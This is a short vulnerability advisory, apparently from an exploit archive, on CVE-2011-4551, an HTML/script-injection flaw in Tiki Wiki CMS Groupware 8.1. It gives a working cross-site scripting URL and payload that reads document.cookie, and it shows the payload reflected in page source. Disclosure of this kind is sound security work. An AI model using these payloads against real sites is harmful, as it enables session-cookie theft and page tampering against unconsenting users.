Tiki Wiki CMS Groupware 8.1 - 'show_errors' HTML Injection

Related Vulnerabilities: CVE-2011-4551  
Publish Date: 20 Dec 2011
                source: http://www.securityfocus.com/bid/51128/info

Tiki Wiki CMS Groupware is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. 

Tested with Firefox 7.01

Visit this URL

http://www.example.com/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss=</style></script><script>alert(document.cookie)</script> -> blank site

But when you visit one of this pages, the XSS will be executed


// browser source code

show_errors: 'y',
		xss: '</style></script><script>alert(document.cookie)</script>'

Another example:


All of them will be executed!

// browser source code

show_errors: 'y',
	xss1: '</style></script><script>alert(document.cookie)</script>',
	xss2: '</style></script><script>alert(document.cookie)</script>',
	xss3: '</style></script><script>alert(document.cookie)</script>'